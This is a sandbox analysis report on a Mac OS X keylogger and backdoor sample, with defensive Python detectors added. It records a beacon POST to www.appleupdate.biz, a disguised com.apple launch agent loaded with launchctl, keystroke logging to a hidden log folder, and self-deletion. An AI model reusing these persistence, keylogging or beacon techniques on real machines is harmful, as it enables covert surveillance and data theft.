Analysis Report

Overview

General Information

Analysis ID: 0
Start time: 22:03:15
Start date: 24/09/2014
Overall analysis duration: 0h 3m 22s
Report type: full
Sample file name: sample-xslcmd
Cookbook file name: keylogging.jbs
Analysis system description: Mac OS X, Lion, clean


Detection

Strategy: Threshold
Detection result: malicious


Signature Overview


Networking:

Urls found in memory or binary data
  Source: sample-xslcmd | String found in binary or memory: http://%s/%s
  Source: sample-xslcmd | String found in binary or memory: http://1234/config.htm
  Source: sample-xslcmd | String found in binary or memory: http://babelfish.yahoo.com/translate_url?doit=done&tt=url&intl=1&fr=bf-home&trurl=%s?%d&lp=en_fr&btn
  Source: sample-xslcmd | String found in binary or memory: http://crl.verisign.com/pca3.crl0
  Source: sample-xslcmd | String found in binary or memory: http://evsecure-aia.verisign.com/evsecure2006.cer0n
  Source: sample-xslcmd | String found in binary or memory: http://evsecure-crl.verisign.com/evsecure2006.crl0d
  Source: sample-xslcmd | String found in binary or memory: http://evsecure-crl.verisign.com/pca3-g5.crl0
  Source: sample-xslcmd | String found in binary or memory: http://evsecure-ocsp.verisign.com0
  Source: sample-xslcmd | String found in binary or memory: http://evsecure-ocsp.verisign.com0=
  Source: sample-xslcmd | String found in binary or memory: http://logo.verisign.com/vslogo.gif0)
  Source: sample-xslcmd | String found in binary or memory: http://logo.verisign.com/vslogo.gif04
  Source: sample-xslcmd | String found in binary or memory: http://logo.verisign.com/vslogo1.gif0
  Source: sample-xslcmd | String found in binary or memory: http://ocsp.verisign.com0
  Source: sample-xslcmd | String found in binary or memory: http://th
  Source: sample-xslcmd | String found in binary or memory: http://translate.google.com
  Source: sample-xslcmd | String found in binary or memory: http://translate.google.com/translate?prev=hp&hl=en&js=n&u=%s?%d&sl=es&tl=en
  Source: sample-xslcmd | String found in binary or memory: http://www.apple.com/dtds/propertylist-1.0.dtd
  Source: sample-xslcmd | String found in binary or memory: https://www.verisign.com/cps0
  Source: sample-xslcmd | String found in binary or memory: https://www.verisign.com/cps0=
  Source: sample-xslcmd | String found in binary or memory: https://www.verisign.com/rpa
  Source: sample-xslcmd | String found in binary or memory: https://www.verisign.com/rpa0
  Note: the verisign.com entries are the CRL, OCSP, AIA and policy URLs of an embedded X.509 certificate chain; the trailing "0", "0=", "0n", "0d", "0)" and "04" characters are the adjacent ASN.1 tag and length bytes (0x30, the SEQUENCE tag, renders as "0") picked up by the string scanner. The apple.com entry is the standard plist DTD reference. None of these is a command-and-control endpoint. The entries containing %s and %d are printf-style templates the sample fills in at run time.
Found strings which match to known social media urls
  Source: sample-xslcmd | String found in binary or memory: http://babelfish.yahoo.com/translate_url?doit=done&tt=url&intl=1&fr=bf-home&trurl=%s?%d&lp=en_fr&btnTrUrl=Translate equals www.yahoo.com (Yahoo)
Performs DNS lookups
  Source: unknown | DNS traffic detected: queries for: db._dns-sd._udp.0.50.168.192.in-addr.arpa
Posts data to webserver
  Source: unknown | HTTP traffic detected:
    POST compose.aspx?s=6058ED81C06DAC84431B7823AB50C2A60B7ACD910D63AF1 HTTP/1.1
    Accept: */*
    Referer: http://www.appleupdate.biz/windows/cartoon
    Accept-Language: zh-cn
    Accept-Encoding: gzip
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
    Host: www.appleupdate.biz
    Connection: Keep-Alive
    Content-Length: 112
    Data Raw: 70 00 a7 94 af e4 fb 6f 53 78 80 00 5b f1 73 fc 68 fd b1 fd 84 ff 0d fd 87 ea 56 fd 6a f0 3f fb 7f ec 41 fc 3b f2 a3 fc 06 f1 d1 fd 36 f1 0c fc 66 f1 3c fd fa f1 f4 00 ea e5 f4 fa f4 ea f4 fb f8 f1 18 ff 20 e5 94 fd 46 f1 60 fd fa f1 f4 fd fa ea dc fd f2 f1 cc fd fa f1 f8 fd 5a f1 e4 fd b4 ff ec fd fa ef f4 ff fa f0 f0 fc f2 e8 9e fd
    Data Ascii: poSx[shVj?A;6f< F`Z
  Note: the body is exactly 112 bytes, matching Content-Length, and is not printable text, so it is encrypted or otherwise encoded. The User-Agent claims Internet Explorer 6 on Windows XP although the request comes from a Mac OS X host, and the request target lacks the leading "/" of a browser-generated request line.
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
  Source: unknown | DNS traffic detected: query: db._dns-sd._udp.0.50.168.192.in-addr.arpa reply code: Name error (3)
  Source: unknown | DNS traffic detected: query: r._dns-sd._udp.0.50.168.192.in-addr.arpa reply code: Name error (3)
  Source: unknown | DNS traffic detected: query: dr._dns-sd._udp.0.50.168.192.in-addr.arpa reply code: Name error (3)
  Source: unknown | DNS traffic detected: query: lb._dns-sd._udp.0.50.168.192.in-addr.arpa reply code: Name error (3)
  Source: unknown | DNS traffic detected: query: b._dns-sd._udp.0.50.168.192.in-addr.arpa reply code: Name error (3)
  Note: this signature is a false positive here. The b, db, r, dr and lb._dns-sd._udp.<reverse-of-local-subnet> names are the DNS-SD browse and registration domain enumeration queries that OS X itself issues for the local network (RFC 6763, section 11); NXDOMAIN answers for them are normal on a LAN without unicast DNS-SD and are not evidence of an expired C2 domain. The sample's own network activity is the HTTP POST above and the port 8000 traffic below.
Uses network protocols on non-standard ports
  Source: unknown | Network traffic detected: HTTP traffic on port 49224 -> 8000
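The POST recorded above is the one network transaction in this report that belongs to the sample rather than to the OS or the sandbox. The Python below is an added example, not part of the sandbox report or code from the sample: it parses that request head (copied from the report; the 112-byte binary body is omitted) and evaluates the traits that mark it as a hand-rolled beacon rather than browser traffic: a Windows/MSIE User-Agent emitted by a Mac OS X host, a request target that is not in origin-form (as rendered in the report the request line has no leading "/"; the check assumes that rendering is faithful), a small POST with no Content-Type, and HTTP on port 8000. The set of ports treated as normal for cleartext HTTP and the indicator names are this example's own assumptions.

```python
"""Triage of the HTTP POST recorded in the report.

Added example, not part of the sandbox report or the sample. Parses a raw HTTP
request head and names the traits that mark the captured request as a
hand-rolled beacon rather than browser traffic. STANDARD_HTTP_PORTS and the
indicator names are assumptions of this example.
"""
from __future__ import annotations

import re
from dataclasses import dataclass, field

# Request line and headers exactly as the report renders them; the 112-byte
# binary body shown as "Data Raw" in the report is omitted here.
OBSERVED_REQUEST = (
    "POST compose.aspx?s=6058ED81C06DAC84431B7823AB50C2A60B7ACD910D63AF1 HTTP/1.1\r\n"
    "Accept: */*\r\n"
    "Referer: http://www.appleupdate.biz/windows/cartoon\r\n"
    "Accept-Language: zh-cn\r\n"
    "Accept-Encoding: gzip\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n"
    "Host: www.appleupdate.biz\r\n"
    "Connection: Keep-Alive\r\n"
    "Content-Length: 112\r\n"
    "\r\n"
)

# Assumption: ports on which plain HTTP is expected in the monitored environment.
STANDARD_HTTP_PORTS = {80, 8080}


@dataclass
class HttpRequest:
    method: str
    target: str
    version: str
    headers: dict[str, str] = field(default_factory=dict)  # header names lower-cased


def parse_request(raw: str) -> HttpRequest:
    """Split a request head into request line and headers; the body is ignored."""
    head, _, _body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, version = lines[0].split(" ", 2)
    headers: dict[str, str] = {}
    for line in lines[1:]:
        # Split at the first colon only, so "http://..." values survive intact.
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return HttpRequest(method, target, version, headers)


def beacon_indicators(req: HttpRequest, *, client_os: str, dst_port: int) -> list[str]:
    """Return the names of the indicators that fire for one request."""
    hits: list[str] = []
    ua = req.headers.get("user-agent", "")
    # A Mac process claiming to be IE 6 on Windows XP is lying about itself.
    if client_os == "Mac OS X" and re.search(r"MSIE|Windows NT", ua):
        hits.append("windows-ua-from-mac")
    # Browsers send origin-form targets ("/path") or absolute URIs; this one
    # starts with "compose.aspx", which no browser stack produces.
    if not req.target.startswith(("/", "http://", "https://")):
        hits.append("non-origin-form-target")
    # A short POST body with no Content-Type is typical of custom C2 framing.
    length = req.headers.get("content-length", "")
    if (req.method == "POST" and length.isdigit() and 0 < int(length) < 256
            and "content-type" not in req.headers):
        hits.append("small-post-without-content-type")
    if dst_port not in STANDARD_HTTP_PORTS:
        hits.append(f"http-on-port-{dst_port}")
    return hits


if __name__ == "__main__":
    request = parse_request(OBSERVED_REQUEST)
    print(request.method, request.headers["host"], request.target)
    print(beacon_indicators(request, client_os="Mac OS X", dst_port=8000))
```

Run against the request as captured (client OS "Mac OS X", destination port 8000) all four indicators fire; the same request seen from a Windows host on port 80 still trips the two that do not depend on context, the malformed target and the small untyped POST.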

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Captures keyboard strokes that are written to a log file
  Source: /Users/urugan/Library/LaunchAgents/clipboardd | Detected decoy string in file: /Users/urugan/Library/Logs/BackupData/20140925_0003_50_keys.log
  Source: /Applications/TextEdit.app/Contents/MacOS/TextEdit | Detected decoy string in file: /private/var/folders/6s/pncyckn14gl55c5_8kr9m_k80000gn/T/com.apple.TextEdit/TemporaryItems/(A Document Being Saved By TextEdit)/Unsaved TextEdit Document.rtf
  Note: the keylogging cookbook types a decoy string into TextEdit; the TextEdit hit is that document's autosave and is expected. The clipboardd hit is the finding: the dropped agent wrote the typed text to a dated _keys.log file under ~/Library/Logs/BackupData.

Persistence and Installation Behavior:

Writes property list (.plist) files to disk
  Source: /Applications/Utilities/Terminal.app/Contents/MacOS/Terminal | XML plist file created: /Users/urugan/Library/Preferences/com.apple.Terminal.plist.MAyXsTm
  Source: /Applications/Utilities/Terminal.app/Contents/MacOS/Terminal | XML plist file created: /Users/urugan/Library/Preferences/com.apple.Terminal.plist.nMuwT1L
  Source: /Users/urugan/Desktop/sample-xslcmd | Binary plist file created: /Users/urugan/Library/LaunchAgents/com.apple.service.clipboardd.plist (listed as "XML document text" under Created / dropped Files below)
  Source: /Applications/TextEdit.app/Contents/MacOS/TextEdit | Binary plist file created: /private/var/folders/6s/pncyckn14gl55c5_8kr9m_k80000gn/T/com.apple.TextEdit/TemporaryItems/(A Document Being Saved By TextEdit)/com.apple.TextEdit.plist
Creates hidden files, links and/or directories
  Source: /Users/urugan/Library/LaunchAgents/clipboardd | Hidden file created: /Users/urugan/Desktop/.got
  Source: /Users/urugan/Library/LaunchAgents/clipboardd | Hidden file created: /Users/urugan/Documents/.got
Explicitly loads/starts launch services
  Source: /bin/sh | Launch agent/daemon loaded: launchctl load /Users/urugan/Library/LaunchAgents/com.apple.service.clipboardd.plist
Writes FAT Mach-O files to disk
  Source: /Users/urugan/Desktop/sample-xslcmd | File written: /Users/urugan/Library/LaunchAgents/clipboardd
  Source: /usr/sbin/kextcache | File written: /System/Library/Caches/com.apple.kext.caches/Startup/kernelcache.m11n
Writes RTF files to disk
  Source: /Applications/TextEdit.app/Contents/MacOS/TextEdit | File written: /private/var/folders/6s/pncyckn14gl55c5_8kr9m_k80000gn/T/com.apple.TextEdit/TemporaryItems/(A Document Being Saved By TextEdit)/Unsaved TextEdit Document.rtf
  Note: only the entries whose source is sample-xslcmd, the dropped clipboardd, or the /bin/sh it spawns (see Startup) describe the sample. The Terminal and TextEdit entries are produced by the keylogging cookbook's own interaction with the desktop, and the kextcache entry is the OS rebuilding its kernel extension cache. The label com.apple.service.clipboardd imitates Apple's naming; Apple's own agents live in /System/Library/LaunchAgents, not in a user's ~/Library/LaunchAgents.

Boot Survival:

Creates highly persistent launch services
  Source: /Users/urugan/Desktop/sample-xslcmd | Launch agent/daemon created with KeepAlive and/or RunAtLoad, file created: /Users/urugan/Library/LaunchAgents/com.apple.service.clipboardd.plist
Creates user-wide 'launchd' managed services aka launch agents
  Source: /Users/urugan/Desktop/sample-xslcmd | Bundle Info.plist file created: /Users/urugan/Library/LaunchAgents/com.apple.service.clipboardd.plist
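The persistence chain the two sections above describe (copy itself to ~/Library/LaunchAgents/clipboardd, write a com.apple.*-labelled launch agent plist with RunAtLoad and/or KeepAlive, load it with launchctl, drop hidden .got markers and a dated _keys.log under ~/Library/Logs/BackupData) can be turned into a host triage check. The Python below is an added example, not part of the report and not code from the sample: it audits a launchd job plist and matches file paths against the indicators this report lists. The plist content is constructed for the example from the report's signatures (the report does not reproduce the real file's keys), the benign comparison plist is invented, and the indicator names and the list of directories where Apple-shipped executables live are this example's own assumptions.

```python
"""Launch agent and file-path triage for the persistence chain in this report.

Added example, not part of the sandbox report or the sample. SAMPLE_PLIST is
constructed from the report's signatures (a com.apple.*-labelled agent with
RunAtLoad and KeepAlive whose program lives inside ~/Library/LaunchAgents); the
real plist's keys are not reproduced in the report. Indicator names are this
example's own.
"""
from __future__ import annotations

import plistlib
import re
from pathlib import PurePosixPath

# Constructed stand-in for /Users/urugan/Library/LaunchAgents/com.apple.service.clipboardd.plist
SAMPLE_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/dtds/propertylist-1.0.dtd">
<plist version="1.0">
<dict>
  <key>Label</key><string>com.apple.service.clipboardd</string>
  <key>ProgramArguments</key>
  <array><string>/Users/urugan/Library/LaunchAgents/clipboardd</string></array>
  <key>RunAtLoad</key><true/>
  <key>KeepAlive</key><true/>
</dict>
</plist>
"""

# Constructed benign agent for comparison: vendor label, program inside an app bundle.
BENIGN_PLIST = plistlib.dumps({
    "Label": "com.example.updater",
    "Program": "/Applications/Example.app/Contents/MacOS/updater",
    "RunAtLoad": True,
})

# Assumption: where executables shipped by Apple are found. A job labelled
# com.apple.* whose program lives elsewhere is impersonating Apple.
APPLE_BINARY_PREFIXES = ("/System/", "/usr/", "/bin/", "/sbin/", "/Applications/")


def program_path(job: dict) -> str | None:
    """launchd accepts either Program or ProgramArguments[0]."""
    if "Program" in job:
        return job["Program"]
    args = job.get("ProgramArguments") or []
    return args[0] if args else None


def audit_launch_agent(plist_bytes: bytes, plist_path: str) -> list[str]:
    """Findings for one launchd job plist located at plist_path."""
    job = plistlib.loads(plist_bytes)
    findings: list[str] = []
    label = str(job.get("Label", ""))
    plist_dir = PurePosixPath(plist_path).parent

    # Apple installs its agents under /System/Library/LaunchAgents; a com.apple.*
    # label under a user's LaunchAgents directory is unusual and worth review.
    if label.startswith("com.apple.") and plist_path.startswith("/Users/"):
        findings.append("apple-label-in-user-launchagents")
    if job.get("RunAtLoad") is True:
        findings.append("runatload")
    keepalive = job.get("KeepAlive")
    if keepalive is True or isinstance(keepalive, dict):
        findings.append("keepalive")  # launchd restarts the job whenever it exits
    prog = program_path(job)
    if prog:
        if PurePosixPath(prog).parent == plist_dir:
            findings.append("program-stored-inside-launchagents-dir")
        if label.startswith("com.apple.") and not prog.startswith(APPLE_BINARY_PREFIXES):
            findings.append("apple-label-non-apple-binary")
    return findings


def scan_paths(paths: list[str]) -> list[tuple[str, str]]:
    """Match file paths against the file-system indicators listed in the report."""
    hits: list[tuple[str, str]] = []
    for p in paths:
        if re.search(r"/Library/Logs/BackupData/\d{8}_\d{4}_\d{2}_keys\.log$", p):
            hits.append(("keylog-output", p))
        elif re.search(r"/(Desktop|Documents)/\.got$", p):
            hits.append(("hidden-marker-file", p))
        elif re.search(r"/Library/LaunchAgents/[^/]+$", p) and not p.endswith(".plist"):
            hits.append(("non-plist-file-in-launchagents", p))  # the directory should hold only plists
    return hits


# Paths as listed in the report, plus one benign preference file for contrast.
OBSERVED_PATHS = [
    "/Users/urugan/Library/LaunchAgents/clipboardd",
    "/Users/urugan/Library/LaunchAgents/com.apple.service.clipboardd.plist",
    "/Users/urugan/Library/Logs/BackupData/20140925_0003_50_keys.log",
    "/Users/urugan/Desktop/.got",
    "/Users/urugan/Documents/.got",
    "/Users/urugan/Library/Preferences/com.apple.Terminal.plist",
]

if __name__ == "__main__":
    print(audit_launch_agent(SAMPLE_PLIST, "/Users/urugan/Library/LaunchAgents/com.apple.service.clipboardd.plist"))
    print(audit_launch_agent(BENIGN_PLIST, "/Users/urugan/Library/LaunchAgents/com.example.updater.plist"))
    print(scan_paths(OBSERVED_PATHS))
```

On a live host the same functions would be fed the bytes of each file under ~/Library/LaunchAgents and a walk of the user's home directory; RunAtLoad alone is common in legitimate agents, so it is the combination with the Apple-style label and a program stored in the LaunchAgents directory itself that should raise the alert.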

Hooking and other Techniques for Hiding and Protection:

Moves itself during installation or deletes itself after installation
  Source: /Applications/Utilities/Terminal.app/Contents/MacOS/Terminal | File moved: /Users/urugan/Library/Preferences/com.apple.Terminal.plist.MAyXsTm -> /Users/urugan/Library/Preferences/com.apple.Terminal.plist
  Source: /Applications/Utilities/Terminal.app/Contents/MacOS/Terminal | File moved: /Users/urugan/Library/Preferences/com.apple.Terminal.plist.nMuwT1L -> /Users/urugan/Library/Preferences/com.apple.Terminal.plist
  Source: /Users/urugan/Desktop/sample-xslcmd | File deleted: /Users/urugan/Desktop/sample-xslcmd
  Note: the two Terminal entries are Terminal's own atomic preference save (write to a temporary name, then rename over the .plist) and are unrelated to the sample. The finding is the last entry: the sample deletes itself from the Desktop after writing /Users/urugan/Library/LaunchAgents/clipboardd, and that dropped file has the same MD5, SHA-1 and SHA-256 as the original sample (compare Created / dropped Files with Static File Info), so the installation is a copy of itself into the LaunchAgents directory followed by deletion of the original.
Uses network protocols on non-standard ports
  Source: unknown | Network traffic detected: HTTP traffic on port 49224 -> 8000

Language, Device and Operating System Detection:

Sample file contains a Mach-O for PowerPC architectures
  Source: initial sample | Static MACH information: PowerPC
FAT Mach-O sample file contains more than two architectures
  Source: initial sample | Static MACH information: Mach-O fat file with 3 architectures
Queries OS software version with built-in shell command
  Source: /bin/sh | sw_vers executed: sw_vers -productVersion
  Source: /bin/sh | sw_vers executed: sw_vers -productName

Stealing of Sensitive Information:

Captures keyboard strokes that are written to a log file
  Source: /Users/urugan/Library/LaunchAgents/clipboardd | Detected decoy string in file: /Users/urugan/Library/Logs/BackupData/20140925_0003_50_keys.log
  Source: /Applications/TextEdit.app/Contents/MacOS/TextEdit | Detected decoy string in file: /private/var/folders/6s/pncyckn14gl55c5_8kr9m_k80000gn/T/com.apple.TextEdit/TemporaryItems/(A Document Being Saved By TextEdit)/Unsaved TextEdit Document.rtf

Yara Overview

No Yara matches

Startup

  • system is mac-lion
  • /Users/urugan/Library/LaunchAgents/clipboardd (PID: 241 Overlayed Process Image: /sbin/launchd MD5: 52c04ccf3d574f6697675fc8de3cc27a)
    • /bin/sh (PID: 244 MD5: 4868ba7156ac0a7f002ffebee9f7a2f9)
      • /bin/sh (PID: 245 MD5: 4868ba7156ac0a7f002ffebee9f7a2f9)
      • /usr/bin/sw_vers (PID: 245 Overlayed Process Image: /bin/sh MD5: 66d6bb0d883321ea482a0acf6ec6ea1f)
    • /bin/sh (PID: 246 MD5: 4868ba7156ac0a7f002ffebee9f7a2f9)
      • /bin/sh (PID: 247 MD5: 4868ba7156ac0a7f002ffebee9f7a2f9)
      • /usr/bin/sw_vers (PID: 247 Overlayed Process Image: /bin/sh MD5: 66d6bb0d883321ea482a0acf6ec6ea1f)
  • /usr/sbin/cupsd (PID: 259 Overlayed Process Image: /sbin/launchd MD5: d44808ca1ae55e8c2a17b84381d2fce5)
  • cleanup

Created / dropped Files

File Path | Type and Hashes
/System/Library/Caches/com.apple.kext.caches/Startup/kernelcache.m11n
  • Type: Mach-O fat file with 2 architectures
  • MD5: 6784D46DF16BD7D4ABC891F7D277F9A0
  • SHA: 2EB6770852DC05964FF9C591CDE4E00DE17A31C8
  • SHA-256: 95F4068C0A26D1B30FDC65F96EBF1079DE8C9D325C5A4405D705FE2E10A35518
  • SHA-512: FDAD55B057748CC4E718B25A47CCA4A7773E0E487303D535D0BFCBE3FAB54E1C94946920AF3074AF2F4454F34CFA7A09A8CF6F67C1DA674CC46517B87F809F16
/Users/urugan/.bash_history
  • Type: ASCII text
  • MD5: D33789EBDACDCB54DABF3918C704CE31
  • SHA: 49A7B2764578548599B33C74069295860EEA92BA
  • SHA-256: DE4710077B4AD73EFD7DA9A7EFA7A3D508855182F5A6129BA2AB2F4F1659ECB4
  • SHA-512: 9E560A98F81E31EE2796F4CD63E073181BD29AA45CF92981BFCA79F3B83690EFAFC44666D9BAC98DC17F33505F80E109F01EECE55EDB4E5D0611708AB6C82CFE
/Users/urugan/Library/LaunchAgents/clipboardd
  • Type: Mach-O fat file with 3 architectures
  • MD5: 60242AD3E1B6C4D417D4DFEB8FB464A1
  • SHA: 46BB20AEFD09EA0BAD534D3AA9B567D89B5AE8C4
  • SHA-256: 1DB30D5B2BB24BCC4B68D647C6A2E96D984A13A28CC5F17596B3BFE316CCA342
  • SHA-512: 68CF6CB442F0A9CDEF6E253D3C5AABD6C38D24B8676A842428AECEBB4E3637693BE9F4564A30F0736191240747A38AB18A51AE168762CA4270DADD71AB2FFE80
/Users/urugan/Library/LaunchAgents/com.apple.service.clipboardd.plist
  • Type: XML document text
  • MD5: F53CF5BABC4537EA869265744F096D83
  • SHA: 77707980DAD9FB40F31AD96F18EF37B197A25B8B
  • SHA-256: 4E33C0B4A5AE10071E44B9AD06524354D03727D4F8700981FDE5354AAB0A0676
  • SHA-512: 3E3A4620EBEA4B7892914769D2B87C11B62D29EE9E94F172AF495CC0FD8918B538AFD70CBBB9C94476600412E2E4460F3EE832DC7097990B83A4FC87AE6726BC
/Users/urugan/Library/Logs/BackupData/20140925_0003_50_keys.log
  • Type: ASCII text, with CRLF line terminators
  • MD5: 6869C6A42FDF9596F536ED49216318D3
  • SHA: FBD788B717070C73F7E40A3800241D7C27B27385
  • SHA-256: 26C45F71D42541B496D23E5B9BD30393BE04F2B62FCBEB2D06CF6F3C055BD115
  • SHA-512: C55CC3E7148E4BBEA5BD893E0EB60AF8CDF5CC603B57C911567677514EC300E08E34F35E44D18BED095958573090AED006963407176A9A364F336355E28A14F9
/Users/urugan/Library/Preferences/com.apple.Terminal.plist.MAyXsTm
  • Type: Apple binary property list
  • MD5: 3B7331BF2DC6EB3E18D01E0FD28AFBC9
  • SHA: 12F783A60059159A3E037AA6EF69B1242BD40210
  • SHA-256: 0EB0DB74CCF6EAB0971C368D1394920024E1267D103A4BF0EE23DF54CD8AAD18
  • SHA-512: 2A0FE4225729BCBFC8FFB5AA83348A5DAC3CB1D6AC857D1D468C390F8D9C5B6E837305158D75E6F611DC5802C52CB2895C77673813BB3786246DA89B493DF330
/Users/urugan/Library/Preferences/com.apple.Terminal.plist.nMuwT1L
  • Type: Apple binary property list
  • MD5: EE3EC3014D77202A85A90AA28CB8B4C5
  • SHA: 5FD3814579241724B7135BBDC2D89216743D18D8
  • SHA-256: 2B81F25FA123035313B907E85FDE39C919E6C734DAAB80ACD9136809A02F12DB
  • SHA-512: AA7AD5107336F9AB3CACA0FE4044A560D802A59A15E09AD4B1E03E2430B36F009E95CDD93E91A409A6DC13ED782C08612D7EBB417990AE68F653F8A7DCB4757A
/dev/ptmx
  • Type: ASCII text
  • MD5: D33789EBDACDCB54DABF3918C704CE31
  • SHA: 49A7B2764578548599B33C74069295860EEA92BA
  • SHA-256: DE4710077B4AD73EFD7DA9A7EFA7A3D508855182F5A6129BA2AB2F4F1659ECB4
  • SHA-512: 9E560A98F81E31EE2796F4CD63E073181BD29AA45CF92981BFCA79F3B83690EFAFC44666D9BAC98DC17F33505F80E109F01EECE55EDB4E5D0611708AB6C82CFE
/private/etc/cups/certs/0
  • Type: ASCII text, with no line terminators
  • MD5: A1005E62F7D4202B730AED0B3C45A5D9
  • SHA: AB77AD9F62D50EBE3978CDCC17BD442D188532B1
  • SHA-256: B6201BE38E452603F9B1F8428573D00071AFDAD67DAC629BC7A679B6243DF621
  • SHA-512: B0E12F52C705FF8011732C882BB797321618E52E391881DDC8F1F4F9002865E0D3B9A38A399C1A0854578B4B4FE1A7D815C55730324C42B3272A01B13942DF88
/private/tmp/00103542e8af9
  • Type: ASCII text, with very long lines
  • MD5: 5BE4941DB87B926FBFC7FC047ED07876
  • SHA: F1DBEBE258272FE5F9399E300AE1A3EB82A8D907
  • SHA-256: EADF35D77DA90197F931C524515112C1D4B88057AE9CDCBC09292C483F6E0D97
  • SHA-512: 44DFF34AA94CECF84331AE608BBDF6F536B7887AF59BEC2FBF6BD408AD0D3DE459E8AB1055C4D1F70B887EE9A151CC85BDF2BAAC156399096286208FA6914BFE
/private/var/folders/6s/pncyckn14gl55c5_8kr9m_k80000gn/T/com.apple.TextEdit/TemporaryItems/(A Document Being Saved By TextEdit)/Unsaved TextEdit Document.rtf
  • Type: Rich Text Format data, version 1, ANSI
  • MD5: F98C005C0BC0FF7C439EFFAFFD096A95
  • SHA: 02C61C074194DD60018DA3960A6B502D316431F7
  • SHA-256: BA16E0536DD76409E57E66D27C97DC86EDBCECFE604799B2DC8C5D1F4488E7B1
  • SHA-512: 708D7A0D7C77472A32B2ED47345C9C1BC76A02F38BAB0818D065B24526EECEF7DB13FD3A688B562A759CC91A5166D29075CFA4241C05A9AC93AF60B5B66041CF
/private/var/folders/6s/pncyckn14gl55c5_8kr9m_k80000gn/T/com.apple.TextEdit/TemporaryItems/(A Document Being Saved By TextEdit)/com.apple.TextEdit.plist
  • Type: XML document text
  • MD5: DD48FF3BFBA61CD2CE1386B2B7250B03
  • SHA: 88F9A36590C013724B4694EF0B77AA5E5AE28820
  • SHA-256: DE50E6E58851871F39B8BAD6E55A10342FFA508638F82B09A92E545053AE0553
  • SHA-512: 5157322F2914B08D9931648C51FD30662639B0824FFAB83145B08247D9F09A71F0BE64F8ED7AF10BE752D02D1AB345A30D9A83F2BCCCB5F8AF1B483ECAA4D722
unknown
  • Type: ASCII text, with no line terminators
  • MD5: 9AC0F4C095F70B4395B35783E7073114
  • SHA: D1CE405C01DBDDA80F4BB96878E425A4A48B8C69
  • SHA-256: CAD312F92E65CBEE48420166F3D3ED8B0D67CDE58EC3F2BF3EE894FB445C2D1A
  • SHA-512: 77934B77E0987B4774184F737508BBE9B7A6EC75C338419274676A477910F2138CF4C72BEC84E13DF0D309B570C286FA8733F315771C8C7F8856932E2D2837A6

Contacted Domains/Contacted IPs

Contacted Domains

Name | IP | Name Server | Active | Registrar | e-Mail
r._dns-sd._udp.0.50.168.192.in-addr.arpa | unknown | unknown | unknown | unknown | unknown
lb._dns-sd._udp.0.50.168.192.in-addr.arpa | unknown | unknown | unknown | unknown | unknown
b._dns-sd._udp.0.50.168.192.in-addr.arpa | unknown | unknown | unknown | unknown | unknown
db._dns-sd._udp.0.50.168.192.in-addr.arpa | unknown | unknown | unknown | unknown | unknown
dr._dns-sd._udp.0.50.168.192.in-addr.arpa | unknown | unknown | unknown | unknown | unknown

Contacted IPs

IP | Country | Pingable | Open Ports
8.8.8.8 | United States | unknown | unknown
61.128.110.38 | China | unknown | unknown

Note: 8.8.8.8 is the public resolver that answered the analysis VM's DNS queries. 61.128.110.38 is the only other external address contacted; the report does not state which connection it belongs to, and the Contacted Domains table above does not include a resolution for www.appleupdate.biz, the Host header of the HTTP POST.

Static File Info

General

File type: Mach-O fat file with 3 architectures
File name: sample-xslcmd
File size: 345360 bytes
MD5: 60242ad3e1b6c4d417d4dfeb8fb464a1
SHA1: 46bb20aefd09ea0bad534d3aa9b567d89b5ae8c4
SHA256: 1db30d5b2bb24bcc4b68d647c6a2e96d984a13a28cc5f17596b3bfe316cca342
SHA512: 68cf6cb442f0a9cdef6e253d3c5aabd6c38d24b8676a842428aecebb4e3637693be9f4564a30f0736191240747a38ab18a51ae168762ca4270dadd71ab2ffe80

Static Mach Info

General information for header0 (PowerPC slice)

Endian: > (big-endian)
Size: 32-bit
Architecture: PowerPC
Filetype: execute
Nbr. of load commands: 21

Protection values are VM_PROT bit masks (7 = rwx, 5 = r-x, 3 = rw-, 1 = r--). Section flag values: 1 = S_ZEROFILL, 2 = S_CSTRING_LITERALS, 5 = S_LITERAL_POINTERS, 6 = S_NON_LAZY_SYMBOL_POINTERS, 7 = S_LAZY_SYMBOL_POINTERS, 0x80000400 = S_ATTR_PURE_INSTRUCTIONS | S_ATTR_SOME_INSTRUCTIONS, 0x80000408 = S_SYMBOL_STUBS with those two attributes, 0x6000000b = S_COALESCED | S_ATTR_NO_TOC | S_ATTR_STRIP_STATIC_SYMS. For symbol pointer sections reserved1 is the index into the indirect symbol table; for stub sections reserved2 is the stub size in bytes.

segment_command __PAGEZERO: vmaddr 0, vmsize 4096, fileoff 0, filesize 0, maxprot 0, initprot 0, nsects 0, flags 0
segment_command __TEXT: vmaddr 4096, vmsize 73728, fileoff 0, filesize 73728, maxprot 7, initprot 5, nsects 6, flags 0
  section __text: addr 8952, size 46616, offset 4856, align 2, reloff 0, nreloc 0, flags 2147484672 (0x80000400), reserved1 0, reserved2 0
  section __symbol_stub1: addr 55568, size 2016, offset 51472, align 2, reloff 0, nreloc 0, flags 2147484680 (0x80000408), reserved1 0, reserved2 16
  section __cstring: addr 57584, size 3912, offset 53488, align 2, reloff 0, nreloc 0, flags 2, reserved1 0, reserved2 0
  section __const: addr 61496, size 6576, offset 57400, align 3, reloff 0, nreloc 0, flags 0, reserved1 0, reserved2 0
  section __gcc_except_tab: addr 68072, size 4117, offset 63976, align 2, reloff 0, nreloc 0, flags 0, reserved1 0, reserved2 0
  section __eh_frame: addr 72192, size 5628, offset 68096, align 2, reloff 0, nreloc 0, flags 1610612747 (0x6000000b), reserved1 0, reserved2 0
segment_command __DATA: vmaddr 77824, vmsize 24576, fileoff 73728, filesize 24576, maxprot 7, initprot 3, nsects 8, flags 0
  section __dyld: addr 77824, size 28, offset 73728, align 2, reloff 0, nreloc 0, flags 0, reserved1 0, reserved2 0
  section __nl_symbol_ptr: addr 77852, size 172, offset 73756, align 2, reloff 0, nreloc 0, flags 6, reserved1 126, reserved2 0
  section __la_symbol_ptr: addr 78024, size 504, offset 73928, align 2, reloff 0, nreloc 0, flags 7, reserved1 169, reserved2 0
